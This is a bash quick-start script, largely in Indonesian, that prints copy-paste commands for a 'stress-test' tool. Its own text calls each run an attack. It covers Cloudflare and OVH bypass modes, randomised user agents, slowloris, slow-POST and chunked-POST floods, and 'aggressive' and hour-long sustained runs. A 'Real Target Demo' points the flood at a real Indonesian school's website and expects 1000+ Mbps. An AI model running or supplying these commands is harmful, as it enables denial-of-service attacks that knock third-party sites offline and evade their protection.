#!/bin/bash

echo "╔════════════════════════════════════════════════════════╗"
echo "║     STRESS TEST TOOL - QUICK START EXAMPLES           ║"
echo "╚════════════════════════════════════════════════════════╝"
echo ""

BINARY="./target/release/stress-test"

echo "📋 CARA EKSEKUSI KODE"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo ""

echo "1️⃣  COMMAND DASAR (Attack ringan ke example.com):"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "$BINARY --url https://example.com -c 100 -d 10"
echo ""
echo "Penjelasan:"
echo "  --url              = Target URL"
echo "  -c 100             = 100 concurrent connections"
echo "  -d 10              = 10 detik attack"
echo ""
echo "Jalankan dengan:"
echo "$ cd /workspaces/ragrag && $BINARY --url https://example.com -c 100 -d 10"
echo ""
echo ""

echo "2️⃣  COMMAND DENGAN CLOUDFLARE BYPASS:"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "$BINARY --url https://example.com -c 300 -d 20 -b cloudflare --randomize-ua -P"
echo ""
echo "Penjelasan:"
echo "  -b cloudflare      = Aktifkan Cloudflare bypass"
echo "  --randomize-ua     = Acak User-Agent"
echo "  -P                 = Enable connection pooling (HTTP/2)"
echo ""
echo "Jalankan dengan:"
echo "$ cd /workspaces/ragrag && $BINARY --url https://example.com -c 300 -d 20 -b cloudflare --randomize-ua -P"
echo ""
echo ""

echo "3️⃣  COMMAND DENGAN CUSTOM PAYLOAD SIZE:"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "$BINARY --url https://example.com -c 200 -d 30 -p 2048 -m post-chunked -b cloudflare"
echo ""
echo "Penjelasan:"
echo "  -p 2048            = Payload size 2048 KB"
echo "  -m post-chunked    = Method: POST dengan chunked encoding"
echo "  -b cloudflare      = Bypass mode"
echo ""
echo "Jalankan dengan:"
echo "$ cd /workspaces/ragrag && $BINARY --url https://example.com -c 200 -d 30 -p 2048 -m post-chunked -b cloudflare"
echo ""
echo ""

echo "4️⃣  COMMAND MAKSIMAL BANDWIDTH (Real Target Demo):"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "$BINARY --url https://www.smkn1-cmi.sch.id/ -c 300 -d 20 -m mixed -p 2048 -b cloudflare --randomize-ua -P"
echo ""
echo "Penjelasan:"
echo "  -c 300             = 300 concurrent connections"
echo "  -d 20              = 20 detik attack"
echo "  -m mixed           = Random attack methods"
echo "  -p 2048            = 2048 KB payload"
echo "  -b cloudflare      = Cloudflare bypass"
echo "  --randomize-ua     = Acak User-Agent"
echo "  -P                 = Connection pooling"
echo ""
echo "Expected Result:"
echo "  ✅ Requests: 3000+ successful"
echo "  ✅ Bandwidth: 1000+ Mbps"
echo "  ✅ Success Rate: 100%"
echo ""
echo "Jalankan dengan:"
echo "$ cd /workspaces/ragrag && $BINARY --url https://www.smkn1-cmi.sch.id/ -c 300 -d 20 -m mixed -p 2048 -b cloudflare --randomize-ua -P"
echo ""
echo ""

echo "5️⃣  COMMAND ATTACK AGRESIF (Maximum):"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "$BINARY --url https://example.com -c 500 -d 60 -m post-chunked -p 3000 -b cloudflare --randomize-ua -P -r 5"
echo ""
echo "Penjelasan:"
echo "  -c 500             = 500 concurrent connections"
echo "  -d 60              = 60 detik (1 menit) attack"
echo "  -m post-chunked    = POST chunked method (bandwidth heavy)"
echo "  -p 3000            = 3000 KB payload per request"
echo "  -b cloudflare      = Cloudflare bypass"
echo "  --randomize-ua     = Acak User-Agent"
echo "  -P                 = Connection pooling + HTTP/2"
echo "  -r 5               = Retry 5x per request"
echo ""
echo "Jalankan dengan:"
echo "$ cd /workspaces/ragrag && $BINARY --url https://example.com -c 500 -d 60 -m post-chunked -p 3000 -b cloudflare --randomize-ua -P -r 5"
echo ""
echo ""

echo "6️⃣  COMMAND LONG-TERM ATTACK (Sustained):"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "$BINARY --url https://example.com -c 100 -d 3600 -m slowloris -b cloudflare --randomize-ua"
echo ""
echo "Penjelasan:"
echo "  -c 100             = 100 concurrent connections"
echo "  -d 3600            = 3600 detik (1 jam) attack"
echo "  -m slowloris       = Slow header attack (drains connections)"
echo "  -b cloudflare      = Cloudflare bypass"
echo "  --randomize-ua     = Acak User-Agent"
echo ""
echo "Jalankan dengan:"
echo "$ cd /workspaces/ragrag && $BINARY --url https://example.com -c 100 -d 3600 -m slowloris -b cloudflare --randomize-ua"
echo ""
echo ""

echo "═══════════════════════════════════════════════════════════"
echo "📊 PARAMETER REFERENCE"
echo "═══════════════════════════════════════════════════════════"
echo ""
echo "METHOD OPTIONS:"
echo "  • get-flood      = GET with large payloads"
echo "  • post-chunked   = POST with chunked encoding (HIGH BANDWIDTH)"
echo "  • range-request  = HTTP Range headers"
echo "  • pipeline       = HTTP/1.1 pipelining"
echo "  • slowloris      = Slow header attack (CONNECTION DRAIN)"
echo "  • slow-post      = Slow POST (CONNECTION DRAIN)"
echo "  • large-headers  = Oversized headers"
echo "  • conn-reuse     = Connection reuse (HTTP/2)"
echo "  • mixed          = All methods randomly"
echo ""
echo "BYPASS MODES:"
echo "  • generic        = Basic bypass"
echo "  • cloudflare     = Cloudflare-specific (RECOMMENDED)"
echo "  • ovh            = OVH-specific"
echo ""
echo "CONNECTIONS GUIDE:"
echo "  • Light:   50-100 connections"
echo "  • Normal:  200-300 connections"
echo "  • Heavy:   500-1000 connections"
echo ""
echo "DURATION GUIDE:"
echo "  • Test:    5-10 seconds"
echo "  • Normal:  30-60 seconds"
echo "  • Long:    300-3600 seconds"
echo ""
echo "PAYLOAD SIZE:"
echo "  • Default: 1024 KB"
echo "  • Heavy:   2048-5000 KB"
echo ""

echo "═══════════════════════════════════════════════════════════"
echo "✅ STEP-BY-STEP GUIDE"
echo "═══════════════════════════════════════════════════════════"
echo ""
echo "Step 1: Buka terminal"
echo "Step 2: Masuk ke folder:"
echo "        $ cd /workspaces/ragrag"
echo ""
echo "Step 3: Lihat bantuan (opsional):"
echo "        $ ./target/release/stress-test --help"
echo ""
echo "Step 4: Pilih command dari di atas dan jalankan"
echo "        Contoh:"
echo "        $ ./target/release/stress-test --url https://example.com -c 100 -d 10"
echo ""
echo "Step 5: Tunggu sampai selesai, lihat hasil output"
echo "        Output akan menampilkan:"
echo "        • Total Requests"
echo "        • Success Rate (%)"
echo "        • Bandwidth (Mbps)"
echo "        • Requests/sec (RPS)"
echo ""

echo "═══════════════════════════════════════════════════════════"
echo "🎯 QUICK COPY-PASTE COMMANDS"
echo "═══════════════════════════════════════════════════════════"
echo ""
echo "Untuk testing cepat, copy-paste command ini ke terminal:"
echo ""
echo "# Command 1: Test ringan"
echo "cd /workspaces/ragrag && ./target/release/stress-test --url https://example.com -c 100 -d 10"
echo ""
echo "# Command 2: Test dengan Cloudflare bypass"
echo "cd /workspaces/ragrag && ./target/release/stress-test --url https://example.com -c 300 -d 20 -b cloudflare --randomize-ua -P"
echo ""
echo "# Command 3: Test maksimal (seperti demo)"
echo "cd /workspaces/ragrag && ./target/release/stress-test --url https://www.smkn1-cmi.sch.id/ -c 300 -d 20 -m mixed -p 2048 -b cloudflare --randomize-ua -P"
echo ""
echo "# Command 4: Test agresif"
echo "cd /workspaces/ragrag && ./target/release/stress-test --url https://example.com -c 500 -d 60 -m post-chunked -p 3000 -b cloudflare --randomize-ua -P -r 5"
echo ""

